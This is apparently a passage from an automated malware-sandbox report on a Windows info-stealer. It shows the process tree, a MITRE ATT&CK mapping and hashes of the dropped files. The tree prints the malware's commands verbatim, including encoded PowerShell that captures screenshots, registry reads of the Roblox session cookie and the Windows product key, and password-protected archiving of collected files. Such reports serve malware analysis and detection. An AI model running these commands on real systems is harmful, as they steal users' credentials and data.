ZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2708
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3620
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gsuug4ai\gsuug4ai.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4512
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8D2C.tmp" "c:\Users\Admin\AppData\Local\Temp\gsuug4ai\CSCAE1B0E09814746FC85E059A7A3DCB62.TMP"
        6⤵
        
        PID:1612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2232
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:816
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3272
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4200
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4796
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3144
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4124
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:2768
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:5100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI32242\rar.exe a -r -hp"Hola123" "C:\Users\Admin\AppData\Local\Temp\nUmgZ.zip" *"
    3⤵
    PID:2496
  - - C:\Users\Admin\AppData\Local\Temp\_MEI32242\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI32242\rar.exe a -r -hp"Hola123" "C:\Users\Admin\AppData\Local\Temp\nUmgZ.zip" *
      4⤵
      Executes dropped EXE
      PID:4972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3848
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1612
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2608
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:2144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4444
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:2908
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3452
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:1032
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2452

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e448fe0d240184c6597a31d3be2ced58

SHA1
372b8d8c19246d3e38cd3ba123cc0f56070f03cd

SHA256
c660f0db85a1e7f0f68db19868979bf50bd541531babf77a701e1b1ce5e6a391

SHA512
0b7f7eae7700d32b18eee3677cb7f89b46ace717fa7e6b501d6c47d54f15dff7e12b49f5a7d36a6ffe4c16165c7d55162db4f3621db545b6af638035752beab4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f2a71b3e53e8f07bf6e77d46b77fb0d4

SHA1
4fbbe3c08a709facbe4c7df2dda78abdbec130a7

SHA256
6ef4c0eb0603ebc221cce12aeba551b4ed2b4ec55992ec42fe70551ee49c1593

SHA512
e7d69f582dd3af58dd0c1bea4d2fc29d40a53dcd6c137ef8106d206b842554610a3972bbdfa47e3dedfbc349432330f50ac856824442b0bacbdf05198a60ee34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8D2C.tmp

Filesize
1KB

MD5
daa95ca76dc0c8722a78bb36513bdb60

SHA1
1b009745ccb60e7384395050a04c0315ba5f241d

SHA256
bff2f7d66f585080b08ccaae61cd907481e594daf47d3e9d1fa8e88e6720c4ca

SHA512
54cf6dae0537e3bec1a87b02e6252194dce847866191cb6cfd0de80f3fda4536f18b23201f7ac0c8bff64b40c928749815b333a487894f6dad74f445f7f0d571

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32242\VCRUNTIME140.dll

Filesize
106KB

MD5
4585a96cc4eef6aafd5e27ea09147dc6

SHA1
489cfff1b19abbec98fda26ac8958005e88dd0cb

SHA256
a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

SHA512
d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32242\_bz2.pyd

Filesize
48KB

MD5
2d461b41f6e9a305dde68e9c59e4110a

SHA1
97c2266f47a651e37a72c153116d81d93c7556e8

SHA256
abbe3933a34a9653a757244e8e55b0d7d3a108527a3e9e8a7f2013b5f2a9eff4

SHA512
eef132df6e52eb783bad3e6af0d57cb48cda2eb0edb6e282753b02d21970c1eea6bab03c835ff9f28f2d3e25f5e9e18f176a8c5680522c09da358a1c48cf14c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32242\_ctypes.pyd

Filesize
58KB

MD5
1adfe4d0f4d68c9c539489b89717984d

SHA1
8ae31b831b3160f5b88dda58ad3959c7423f8eb2

SHA256
64e8fd952ccf5b8adca80ce8c7bc6c96ec7df381789256fe8d326f111f02e95c

SHA512
b403cc46e0874a75e3c0819784244ed6557eae19b0d76ffd86f56b3739db10ea8deec3dc1ca9e94c101263d0ccf506978443085a70c3ab0816885046b5ef5117

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32242\_decimal.pyd

Filesize
106KB

MD5
a8952538e090e2ff0efb0ba3c890cd04

SHA1
cdc8bd05a3178a95416e1c15b6c875ee026274df

SHA256
c4e8740c5dbbd2741fc4124908da4b65fa9c3e17d9c9bf3f634710202e0c7009

SHA512
5c16f595f17bedaa9c1fdd14c724bbb404ed59421c63f6fbd3bfd54ce8d6f550147d419ec0430d008c91b01b0c42934c2a08dae844c308feec077da713ac842e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32242\_hashlib.pyd

Filesize
35KB

MD5
f10d896ed25751ead72d8b03e404ea36

SHA1
eb8e0fd6e2356f76b5ea0cb72ab37399ec9d8ecb

SHA256
3660b985ca47ca1bba07db01458b3153e4e692ee57a8b23ce22f1a5ca18707c3

SHA512
7f234e0d197ba48396fabd1fccc2f19e5d4ad922a2b3fe62920cd485e5065b66813b4b2a2477d2f7f911004e1bc6e5a6ec5e873d8ff81e642fee9e77b428fb42

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32242\_lzma.pyd

Filesize
85KB

MD5
3798175fd77eded46a8af6b03c5e5f6d

SHA1
f637eaf42080dcc620642400571473a3fdf9174f

SHA256
3c9d5a9433b22538fc64141cd3784800c567c18e4379003329cf69a1d59b2a41

SHA512
1f7351c9e905265625d725551d8ea1de5d9999bc333d29e6510a5bca4e4d7c1472b2a637e892a485a7437ea4768329e5365b209dd39d7c1995fe3317dc5aecdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32242\_queue.pyd

Filesize
25KB

MD5
decdabaca104520549b0f66c136a9dc1

SHA1
423e6f3100013e5a2c97e65e94834b1b18770a87

SHA256
9d4880f7d0129b1de95becd8ea8bbbf0c044d63e87764d18f9ec00d382e43f84

SHA512
d89ee3779bf7d446514fc712dafb3ebc09069e4f665529a7a1af6494f8955ceb040bef7d18f017bcc3b6fe7addeab104535655971be6eed38d0fc09ec2c37d88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32242\_socket.pyd

Filesize
43KB

MD5
bcc3e26a18d59d76fd6cf7cd64e9e14d

SHA1
b85e4e7d300dbeec942cb44e4a38f2c6314d3166

SHA256
4e19f29266a3d6c127e5e8de01d2c9b68bc55075dd3d6aabe22cf0de4b946a98

SHA512
65026247806feab6e1e5bf2b29a439bdc1543977c1457f6d3ddfbb7684e04f11aba10d58cc5e7ea0c2f07c8eb3c9b1c8a3668d7854a9a6e4340e6d3e43543b74

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32242\_sqlite3.pyd

Filesize
56KB

MD5
eb6313b94292c827a5758eea82d018d9

SHA1
7070f715d088c669eda130d0f15e4e4e9c4b7961

SHA256
6b41dfd7d6ac12afe523d74a68f8bd984a75e438dcf2daa23a1f934ca02e89da

SHA512
23bfc3abf71b04ccffc51cedf301fadb038c458c06d14592bf1198b61758810636d9bbac9e4188e72927b49cb490aeafa313a04e3460c3fb4f22bdddf112ae56

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32242\_ssl.pyd

Filesize
62KB

MD5
2089768e25606262921e4424a590ff05

SHA1
bc94a8ff462547ab48c2fbf705673a1552545b76

SHA256
3e6e9fc56e1a9fe5edb39ee03e5d47fa0e3f6adb17be1f087dc6f891d3b0bbca

SHA512
371aa8e5c722307fff65e00968b14280ee5046cfcf4a1d9522450688d75a3b0362f2c9ec0ec117b2fc566664f2f52a1b47fe62f28466488163f9f0f1ce367f86

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32242\base_library.zip

Filesize
1.4MB

MD5
2f6d57bccf7f7735acb884a980410f6a

SHA1
93a6926887a08dc09cd92864cd82b2bec7b24ec5

SHA256
1b7d326bad406e96a4c83b5a49714819467e3174ed0a74f81c9ebd96d1dd40b3

SHA512
95bcfc66dbe7b6ad324bd2dc2258a3366a3594bfc50118ab37a2a204906109e42192fb10a91172b340cc28c12640513db268c854947fb9ed8426f214ff8889b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32242\blank.aes

Filesize
117KB

MD5
8f2f0d6387099fe982ed73a076f1e0eb

SHA1
8cbe2f4bfac1ab5477b417d4e088c8d8ac19885c

SHA256
30484a88e0a869f4423aa28142336a0e2fcbc0946306006e3dc197e8e94bcad3

SHA512
15a3c0b3fb71e7720dd45a27483fecb0e301ce78b573237f93f9efd58ffdf76240071a6b84cda185d79fe54229b9936f79d6245c82db9cdb8ec4bf53ec4b4ee7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32242\bound.blank

Filesize
17.5MB

MD5
a474fed03373282c1bedca887e57866f

SHA1
11cbe14dedf1b5c7416d83486842027c4f709201

SHA256
edfed1315b48868e524b120878085dfa0d23c2c83815a3ea4969400c3d9e73ce

SHA512
340955a70afdb6b042864a05acf57880ac3059c14f126883b307692ff3d2487502c007bf8025c2a39bf70569dea14bf782369436221f7b9f1bb6a312bc9a5145

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32242\libcrypto-1_1.dll

Filesize
1.1MB

MD5
dffcab08f94e627de159e5b27326d2fc

SHA1
ab8954e9ae94ae76067e5a0b1df074bccc7c3b68

SHA256
135b115e77479eedd908d7a782e004ece6dd900bb1ca05cc1260d5dd6273ef15

SHA512
57e175a5883edb781cdb2286167d027fdb4b762f41fb1fc9bd26b5544096a9c5dda7bccbb6795dcc37ed5d8d03dc0a406bf1a59adb3aeb41714f1a7c8901a17d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32242\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32242\libssl-1_1.dll

Filesize
204KB

MD5
8e8a145e122a593af7d6cde06d2bb89f

SHA1
b0e7d78bb78108d407239e9f1b376e0c8c295175

SHA256
a6a14c1beccbd4128763e78c3ec588f747640297ffb3cc5604a9728e8ef246b1

SHA512
d104d81aca91c067f2d69fd8cec3f974d23fb5372a8f2752ad64391da3dbf5ffe36e2645a18a9a74b70b25462d73d9ea084318846b7646d39ce1d3e65a1c47c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32242\python311.dll

Filesize
1.6MB

MD5
5792adeab1e4414e0129ce7a228eb8b8

SHA1
e9f022e687b6d88d20ee96d9509f82e916b9ee8c

SHA256
7e1370058177d78a415b7ed113cc15472974440d84267fc44cdc5729535e3967

SHA512
c8298b5780a2a5eebed070ac296eda6902b0cac9fda7bb70e21f482d6693d6d2631ca1ac4be96b75ac0dd50c9ca35be5d0aca9c4586ba7e58021edccd482958b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32242\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32242\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32242\select.pyd

Filesize
25KB

MD5
90fea71c9828751e36c00168b9ba4b2b

SHA1
15b506df7d02612e3ba49f816757ad0c141e9dc1

SHA256
5bbbb4f0b4f9e5329ba1d518d6e8144b1f7d83e2d7eaf6c50eef6a304d78f37d

SHA512
e424be422bf0ef06e7f9ff21e844a84212bfa08d7f9fbd4490cbbcb6493cc38cc1223aaf8b7c9cd637323b81ee93600d107cc1c982a2288eb2a0f80e2ad1f3c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32242\sqlite3.dll

Filesize
622KB

MD5
395332e795cb6abaca7d0126d6c1f215

SHA1
b845bd8864cd35dcb61f6db3710acc2659ed9f18

SHA256
8e8870dac8c96217feff4fa8af7c687470fbccd093d97121bc1eac533f47316c

SHA512
8bc8c8c5f10127289dedb012b636bc3959acb5c15638e7ed92dacdc8d8dba87a8d994aaffc88bc7dc89ccfeef359e3e79980dfa293a9acae0dc00181096a0d66

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32242\unicodedata.pyd

Filesize
295KB

MD5
c2556dc74aea61b0bd9bd15e9cd7b0d6

SHA1
05eff76e393bfb77958614ff08229b6b770a1750

SHA256
987a6d21ce961afeaaa40ba69859d4dd80d20b77c4ca6d2b928305a873d6796d

SHA512
f29841f262934c810dd1062151aefac78cd6a42d959a8b9ac832455c646645c07fd9220866b262de1bc501e1a9570591c0050d5d3607f1683437dea1ff04c32b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n2owkwpd.5io.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bound.exe

Filesize
18.4MB

MD5
a2223005e6d186689577e5a2b785a16b

SHA1
1075e177247880d3e1ec940623500bf2e9b275e3

SHA256
cef5b60321f17991400a19072052535638c0a5c02d338234686552deadeea82e

SHA512
073f8e682d2468bfe7d55b82cf0ff5dafd2754da2813de2116551e2811809debba7f06c5d8ed5901a59703bfb306fd5fd05d9d1e797bf9e7887826709c6993c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\gsuug4ai\gsuug4ai.dll

Filesize
4KB

MD5
24e457d4f3e31cc7ebbb1b97ca55ad55

SHA1
5c62eecbdc6907167988fd12d6563d42890df556

